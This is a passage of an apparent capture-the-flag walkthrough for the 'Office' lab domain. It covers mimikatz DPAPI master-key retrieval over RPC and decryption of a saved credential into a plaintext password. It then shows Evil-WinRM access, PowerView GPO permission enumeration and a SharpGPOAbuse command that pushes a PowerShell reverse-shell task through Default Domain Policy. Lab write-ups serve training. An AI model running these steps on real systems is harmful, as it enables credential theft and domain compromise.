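    print("masterkey:", parsed["masterkey"]["rounds"], parsed["masterkey"]["algHash"],
          parsed["masterkey"]["algCrypt"])
    print("domainkey guidMasterKey:", parsed["domainkey"]["guidMasterKey"])
```

Run it as a script to see the same header fields mimikatz prints. The point for an analyst is the domainkey section: a user master key carries a copy wrapped under the domain's backup key (guidMasterKey above), which is what makes the /rpc path in the next step possible and why a DC-side Backup Key retrieval should be monitored; the parser surfaces that GUID without touching any secret.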

3. Decrypting to obtain the masterkey here actually requires the password, but if we take the master key file and impersonate the user to call the in-domain service directly, we can do something like key theft and get the key straight into the cache. So I used /rpc here, and since there are two master key files and it's not certain which one will be used, I grabbed both into the cache

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : c521daa0857ee4fa6e4246266081e94c
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : a2741b13d7261697be4241ebbe05098a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : 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
pbAccesscheck : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM:
key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
sha1: 85285eb368befb1670633b05ce58ca4d75c73c77

CREDENTIALS cache
=================

MASTERKEYS cache
================
GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available

DOMAINKEYS cache
================

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d" /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 8bc9f4a7b9094394e57e92daedeafcb9
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : f97146093504382ec842cd2eec5f2bbfbbdd83ab6c4e44ada82d5ae23d1a05422fe6d1378165d4434bf41737616acf823e86c69424271d0f72684018a0928045ef77b719003b352644398f4286795b1297bee821deec898cb167aa76d984808014aa0d22136688c3

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 26773bc8263172355939bdb9cb33e2f9
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 540c745f74ac62c43d245e850eb9952d6daf6a803163b94683eb82a30bf3d20d8e72d4e1003e0f17ca2575722c009e1855333ddacb7f08702369b0035aff50163eee5d2f2384fe28

[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : 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
pbAccesscheck : a98be73386a3dca744e20b13b967e3bc4a1f58bf9be981bf84cf2e2c4daab8ca4def27d6e22540e7eebadd6c122ed75a1b991532d88794e2e999673385241275fe2735bbbb46f9e88dbd799589b42d572ca6b14ecf279a6d


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM:
key : 2c19b1b2f1784e79edaed52a319cc5b4ad42179d4906fd084aef8e6e6dd9b8db
sha1: 4961d54be229fd871debd903b3d518ea4d362c42

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 3f891c81971ccacb02123a9dde170eaae918026ccc0a305b221d3582de4add84c900ae79f950132e4a70b0ef49dea6907b4f319c5dd10f60cc31cb1e3bc33024
sha1: fbab11cacdd8407e8db9604f0f8c92178bee6fd3

mimikatz # dpapi::cache

CREDENTIALS cache
=================

MASTERKEYS cache
================
GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available
GUID:{10811601-0fa9-43c2-97e5-9bef8471fc7d};KeyHash:fbab11cacdd8407e8db9604f0f8c92178bee6fd3;Key:available

DOMAINKEYS cache

4. You can see both master keys are now cached; next just use them to decrypt the cred (to keep the length down I skipped the useless cached passwords)

mimikatz # dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4"
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data

algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a
dwDataLen : 000000c0 - 192
pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
dwSignLen : 00000014 - 20
pbSign : 21bfb22ca38e0a802e38065458cecef00b450976

Decrypting Credential:
* volatile cache: GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000be - 190
credUnk0 : 00000000 - 0

Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 5/9/2023 11:03:21 PM
unkFlagsOrSize : 00000018 - 24
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=OFFICE\HHogan
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : OFFICE\HHogan
CredentialBlob : H4ppyFtW183#
Attributes : 0

So that gave me the password


Log in as hhogan via winrm for the final root part

First, if you'd run BloodHound beforehand or looked at the group memberships, you'd find hhogan has three sets of permissions

*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name HHogan
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 5/6/2023 10:59:34 AM
Password expires Never
Password changeable 5/7/2023 10:59:34 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/10/2023 4:30:58 AM

Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *GPO Managers
The command completed successfully.

*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
**OFFICE\GPO Managers** <------ note Group S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448

Of these, the one we should pay most attention to is GPO Managers. First, this group is a custom group and not one of the standard domain groups.

Second, judging by the name alone, GPO Managers stands for the group policy managers of the domain.

So through these GPOs, i.e. delegated group policy, we can escalate privileges, run commands with specific privileges, and so on, anything within the scope of group policy objects.

The method I used here is SharpGPOAbuse.exe. It has a drawback that isn't really a drawback: it needs a newly created GPO object, or one we can modify, for the tool to use when it runs.

So first we need to find the modifiable objects (I'm a bit lazy and didn't want to create one.. so I don't know whether creating one works).

First import it: . .\PowerView.ps1

Then use this command to find the GPO objects we control

Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "GPO managers" | select objectSid).objectSid)}

I found two usable ones here, so let's look at their details

*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-DomainGPO '{31B2F340-016D-11D2-945F-00C04FB984F9}'


usncreated : 5672
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 5/10/2023 5:30:07 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 57836
dscorepropagationdata : {5/10/2023 5:30:07 PM, 4/14/2023 10:14:59 PM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\office.htb\sysvol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=office,DC=htb
whencreated : 4/14/2023 10:13:57 PM
versionnumber : 18
instancetype : 4
objectguid : 61e3527f-81bf-456a-b79c-f9a86e8127d0
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=office,DC=htb

=====================================================================================================================

*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-DomainGPO '{6AC1786C-016F-11D2-945F-00C04fB984F9}'


usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]
whenchanged : 1/25/2024 10:40:03 PM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 213141
dscorepropagationdata : {5/10/2023 5:29:54 PM, 4/14/2023 10:14:59 PM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\office.htb\sysvol\office.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=office,DC=htb
whencreated : 4/14/2023 10:13:57 PM
versionnumber : 12
instancetype : 4
objectguid : 021296bc-8f0e-4902-89e8-6e566d72c108
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=office,DC=htb

Note the displayname; it'll be needed when modifying the GPO below

Next use SharpGPOAbuse to modify the Default Domain Policy (either of the two works; I chose Default Domain Policy) and push out a task; here I used a ps reverse shell

SharpGPOAbuse.exe --AddComputerTask --TaskName "test1" --Author "NT AUTHORITY\SYSTEM" --Command "powershell.exe" --Arguments "-enc {base64_shell_code}" --GPOName "Default Domain Policy"

get root